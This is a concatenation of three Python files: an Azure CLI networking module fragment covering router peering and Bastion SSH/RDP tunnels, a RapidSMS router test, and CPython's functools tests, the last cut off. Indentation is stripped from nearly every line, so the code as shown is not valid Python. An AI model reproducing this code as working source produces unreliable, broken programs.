with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def list_virtual_router_peering(cmd, resource_group_name, virtual_router_name):
virtual_hub_name = virtual_router_name
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
try:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
vrouter_peerings = list(vrouter_peering_client.list(resource_group_name, virtual_router_name))
except HttpResponseError:
vrouter_peerings = []
virtual_hub_name = virtual_router_name
try:
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connections
vhub_bgp_connections = list(vhub_bgp_conn_client.list(resource_group_name, virtual_hub_name))
except HttpResponseError:
vhub_bgp_connections = []
return list(vrouter_peerings) + list(vhub_bgp_connections)
def show_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
    # if the virtual router doesn't exist, fall back to VirtualHub
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def delete_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except: # pylint: disable=bare-except
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.begin_delete(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
    # if the virtual router doesn't exist, fall back to VirtualHub
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_delete(resource_group_name, virtual_hub_name, bgp_conn_name)
# endregion
# region service aliases
def list_service_aliases(cmd, location, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).available_service_aliases
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name, location=location)
return client.list(location=location)
# endregion
# region bastion
def create_bastion_host(cmd, resource_group_name, bastion_host_name, virtual_network_name,
public_ip_address, location=None, subnet='AzureBastionSubnet'):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
(BastionHost,
BastionHostIPConfiguration,
SubResource) = cmd.get_models('BastionHost',
'BastionHostIPConfiguration',
'SubResource')
ip_config_name = "bastion_ip_config"
ip_configuration = BastionHostIPConfiguration(name=ip_config_name,
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip_address))
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location)
return client.begin_create_or_update(resource_group_name=resource_group_name,
bastion_host_name=bastion_host_name,
parameters=bastion_host)
def list_bastion_host(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
SSH_EXTENSION_NAME = 'ssh'
SSH_EXTENSION_MODULE = 'azext_ssh.custom'
SSH_EXTENSION_VERSION = '0.1.3'
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _test_extension(extension_name):
from azure.cli.core.extension import (get_extension)
from pkg_resources import parse_version
ext = get_extension(extension_name)
if parse_version(ext.version) < parse_version(SSH_EXTENSION_VERSION):
raise CLIError('SSH Extension (version >= "{}") must be installed'.format(SSH_EXTENSION_VERSION))
def _get_ssh_path(ssh_command="ssh"):
import os
ssh_path = ssh_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
is_32bit = arch_data[0] == '32bit'
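        # On 32-bit Python use SysNative so the 64-bit System32 directory is reached despite file-system redirection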
sys_path = 'SysNative' if is_32bit else 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
ssh_path = os.path.join(system32_path, "openSSH", (ssh_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run ssh from path %s", ssh_path)
if not os.path.isfile(ssh_path):
raise CLIError("Could not find " + ssh_command + ".exe. Is the OpenSSH client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for thie command. Supported platforms: Windows")
return ssh_path
def _get_rdp_path(rdp_command="mstsc"):
import os
rdp_path = rdp_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
sys_path = 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
rdp_path = os.path.join(system32_path, (rdp_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run rdp from path %s", rdp_path)
if not os.path.isfile(rdp_path):
raise CLIError("Could not find " + rdp_command + ".exe. Is the rdp client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for thie command. Supported platforms: Windows")
return rdp_path
def _get_host(username, ip):
return username + "@" + ip
def _build_args(cert_file, private_key_file):
private_key = []
certificate = []
if private_key_file:
private_key = ["-i", private_key_file]
if cert_file:
certificate = ["-o", "CertificateFile=" + cert_file]
return private_key + certificate
def ssh_bastion_host(cmd, auth_type, target_resource_id, resource_group_name, bastion_host_name, resource_port=None, username=None, ssh_key=None):
_test_extension(SSH_EXTENSION_NAME)
if not resource_port:
resource_port = 22
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
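    # Start the Bastion tunnel in a background daemon thread; the ssh client below connects to it on localhost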
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
if auth_type.lower() == 'password':
if username is None:
raise RequiredArgumentMissingError("Please enter username with --username.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
elif auth_type.lower() == 'aad':
azssh = _get_azext_module(SSH_EXTENSION_NAME, SSH_EXTENSION_MODULE)
public_key_file, private_key_file = azssh._check_or_create_public_private_files(None, None) # pylint: disable=protected-access
cert_file, username = azssh._get_and_write_certificate(cmd, public_key_file, private_key_file + '-cert.pub') # pylint: disable=protected-access
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(cert_file, private_key_file)
elif auth_type.lower() == 'ssh-key':
if username is None or ssh_key is None:
raise RequiredArgumentMissingError("Please enter username --username and ssh cert location --ssh-key.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(None, ssh_key)
else:
raise UnrecognizedArgumentError("Unknown auth type. Use one of password, aad or akv.")
command = command + ["-p", str(tunnel_server.local_port)]
command = command + ['-o', "StrictHostKeyChecking=no", '-o', "UserKnownHostsFile=/dev/null"]
command = command + ['-o', "LogLevel=Error"]
logger.debug("Running ssh command %s", ' '.join(command))
try:
subprocess.call(command, shell=platform.system() == 'Windows')
except Exception as ex:
raise CLIInternalError(ex)
def rdp_bastion_host(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port=None):
if not resource_port:
resource_port = 3389
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
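    # Start the Bastion tunnel in a background daemon thread; mstsc connects to it on localhost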
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
command = [_get_rdp_path(), "/v:localhost:{0}".format(tunnel_server.local_port)]
logger.debug("Running rdp command %s", ' '.join(command))
subprocess.call(command, shell=platform.system() == 'Windows')
tunnel_server.cleanup()
def get_tunnel(cmd, resource_group_name, name, vm_id, resource_port, port=None):
from .tunnel import TunnelServer
client = network_client_factory(cmd.cli_ctx).bastion_hosts
bastion = client.get(resource_group_name, name)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
tunnel_server = TunnelServer(cmd.cli_ctx, 'localhost', port, bastion, vm_id, resource_port)
return tunnel_server
def create_bastion_tunnel(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port, port, timeout=None):
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port, port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
# endregion
# region security partner provider
def create_security_partner_provider(cmd, resource_group_name, security_partner_provider_name,
security_provider_name, virtual_hub, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
SecurityPartnerProvider, SubResource = cmd.get_models('SecurityPartnerProvider', 'SubResource')
security_partner_provider = SecurityPartnerProvider(security_provider_name=security_provider_name,
virtual_hub=SubResource(id=virtual_hub),
location=location,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
security_partner_provider_name=security_partner_provider_name,
parameters=security_partner_provider)
def update_security_partner_provider(instance, cmd, security_provider_name=None, virtual_hub=None, tags=None):
with cmd.update_context(instance) as c:
c.set_param('security_provider_name', security_provider_name)
c.set_param('virtual_hub', virtual_hub)
c.set_param('tags', tags)
return instance
def list_security_partner_provider(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
# endregion
# region network gateway connection
def reset_shared_key(cmd, client, virtual_network_gateway_connection_name, key_length, resource_group_name=None):
ConnectionResetSharedKey = cmd.get_models('ConnectionResetSharedKey')
shared_key = ConnectionResetSharedKey(key_length=key_length)
return client.begin_reset_shared_key(resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name, # pylint: disable=line-too-long
parameters=shared_key)
def update_shared_key(cmd, instance, value):
with cmd.update_context(instance) as c:
c.set_param('value', value)
return instance
# endregion
# region network virtual appliance
def create_network_virtual_appliance(cmd, client, resource_group_name, network_virtual_appliance_name,
vendor, bundled_scale_unit, market_place_version,
virtual_hub, boot_strap_configuration_blobs=None,
cloud_init_configuration_blobs=None,
cloud_init_configuration=None, asn=None,
location=None, tags=None, no_wait=False):
(NetworkVirtualAppliance,
SubResource,
VirtualApplianceSkuProperties) = cmd.get_models('NetworkVirtualAppliance',
'SubResource',
'VirtualApplianceSkuProperties')
virtual_appliance = NetworkVirtualAppliance(boot_strap_configuration_blobs=boot_strap_configuration_blobs,
cloud_init_configuration_blobs=cloud_init_configuration_blobs,
cloud_init_configuration=cloud_init_configuration,
virtual_appliance_asn=asn,
virtual_hub=SubResource(id=virtual_hub),
nva_sku=VirtualApplianceSkuProperties(
vendor=vendor,
bundled_scale_unit=bundled_scale_unit,
market_place_version=market_place_version
),
location=location,
tags=tags)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, virtual_appliance)
def update_network_virtual_appliance(instance, cmd, cloud_init_configuration=None, asn=None):
with cmd.update_context(instance) as c:
c.set_param('virtual_appliance_asn', asn)
c.set_param('cloud_init_configuration', cloud_init_configuration)
return instance
def list_network_virtual_appliance(cmd, client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
def create_network_virtual_appliance_site(cmd, client, resource_group_name, network_virtual_appliance_name,
site_name, address_prefix, allow=None, optimize=None, default=None,
no_wait=False):
(BreakOutCategoryPolicies,
Office365PolicyProperties,
VirtualApplianceSite) = cmd.get_models('BreakOutCategoryPolicies',
'Office365PolicyProperties',
'VirtualApplianceSite')
virtual_appliance_site = VirtualApplianceSite(address_prefix=address_prefix,
o365_policy=Office365PolicyProperties(
break_out_categories=BreakOutCategoryPolicies(
allow=allow,
optimize=optimize,
default=default
)))
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, site_name, virtual_appliance_site)
def update_network_virtual_appliance_site(instance, cmd, address_prefix, allow=None, optimize=None, default=None):
with cmd.update_context(instance) as c:
c.set_param('address_prefix', address_prefix)
c.set_param('o365_policy.break_out_categories.allow', allow)
c.set_param('o365_policy.break_out_categories.optimize', optimize)
c.set_param('o365_policy.break_out_categories.default', default)
return instance
# endregion
|
test_router.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import unittest, threading, time, datetime
from rapidsms.router import Router
from rapidsms.connection import Connection
from rapidsms.message import Message
from rapidsms.backends.backend import Backend
from rapidsms.tests.harness import MockApp, MockLogger
class TestRouter(unittest.TestCase):
def test_log(self):
r = Router()
r.logger = MockLogger()
r.log("debug", "test message %d", 5)
self.assertEquals(r.logger[0], (r,"debug","test message %d",5),
"log() calls self.logger.write()")
def test_set_logger(self):
### TODO
pass
def test_build_component (self):
r = Router()
r.logger = MockLogger()
component = r.build_component("rapidsms.tests.%s.MockApp",
{"type":"harness", "title":"test app"})
self.assertEquals(type(component), MockApp, "component has right type")
self.assertEquals(component.title, "test app", "component has right title")
self.assertRaises(Exception, r.build_component,
("rapidsms.tests.%s.MockApp",
{"type":"harness", "title":"test app", "argh": "no config"}),
"build_component gracefully handles bad configuration options")
def test_add_backend (self):
r = Router()
r.logger = MockLogger()
r.add_backend({"type":"backend", "title":"test_backend"})
self.assertEquals(len(r.backends), 1, "backends has 1 item")
self.assertEquals(type(r.backends[0]), Backend, "backend has correct type")
def test_add_app (self):
### TODO
pass
def test_start_backend (self):
### TODO
pass
def test_start_all_apps (self):
### TODO
pass
def test_start_all_backends (self):
### TODO
pass
def test_stop_all_backends (self):
### TODO
pass
def test_start_and_stop (self):
r = Router()
r.logger = MockLogger()
threading.Thread(target=r.start).start()
self.assertTrue(r.running)
r.stop()
self.assertTrue(not r.running)
        # not waiting for the router to shut down causes exceptions
        # on global destruction (race condition)
time.sleep(1.0)
def test_run(self):
r = Router()
r.logger = MockLogger()
app = r.build_component("rapidsms.tests.%s.MockApp",
{"type":"harness", "title":"test app"})
r.apps.append(app)
r.add_backend({"type":"backend", "title":"test_backend"})
backend = r.get_backend("test-backend") # NOTE the dash; FIXME
msg = backend.message("test user", "test message")
r.send(msg)
r.run()
received = app.calls[-1][1]
self.assertEquals(msg, received, "message is identical")
self.assertEquals(msg.connection, received.connection, "same connection")
self.assertEquals(msg.text, received.text, "same text")
def test_call_at (self):
def callback(stash, arg1, **argv):
stash["arg1"]=arg1
if "try_again" in argv and "try_again" not in stash:
stash["try_again"] = False
return 1.0
else:
stash.update(argv)
r = Router()
r.logger = MockLogger()
stash = {}
r.call_at(0.5, callback, stash, 1, arg2="a")
r.call_at(datetime.datetime.now() + datetime.timedelta(seconds=0.5), callback, stash, 1, arg3="b")
r.call_at(datetime.timedelta(seconds=1.0), callback, stash, 1, try_again=True)
r.call_at(3, callback, stash, 2)
threading.Thread(target=r.start).start()
time.sleep(1.0)
self.assertEquals(stash["arg1"], 1, "*args ok")
self.assertEquals(stash["arg2"], "a", "**kargs ok")
self.assertEquals(stash["arg3"], "b", "datetime works")
self.assertEquals(stash["try_again"], False, "timedelta works")
time.sleep(3.0)
self.assertEquals(stash["try_again"], True, "repeated callback")
self.assertEquals(stash["arg1"], 2, "int works")
r.stop()
def test_incoming(self):
pass
def test_outgoing(self):
pass
if __name__ == "__main__":
unittest.main()
|
test_functools.py
|
import abc
import collections
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import unittest
from weakref import proxy
try:
import threading
except ImportError:
threading = None
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
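# nested partials are expected to be flattened: partial(partial(signature, 'asdf'), bar=True)
# should look the same as partial(signature, 'asdf', bar=True)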
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial is c_functools.partial:
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual('{}({!r})'.format(name, capture),
repr(f))
f = self.partial(capture, *args)
self.assertEqual('{}({!r}, {})'.format(name, capture, args_repr),
repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
['{}({!r}, {})'.format(name, capture, kwargs_repr)
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
['{}({!r}, {}, {})'.format(name, capture, args_repr, kwargs_repr)
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial is c_functools.partial:
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(%s(...))' % (name, name))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, %s(...))' % (name, capture, name))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=%s(...))' % (name, capture, name))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
class TestPartialPy(TestPartial, unittest.TestCase):
partial = staticmethod(py_functools.partial)
if c_functools:
class PartialSubclass(c_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = PartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
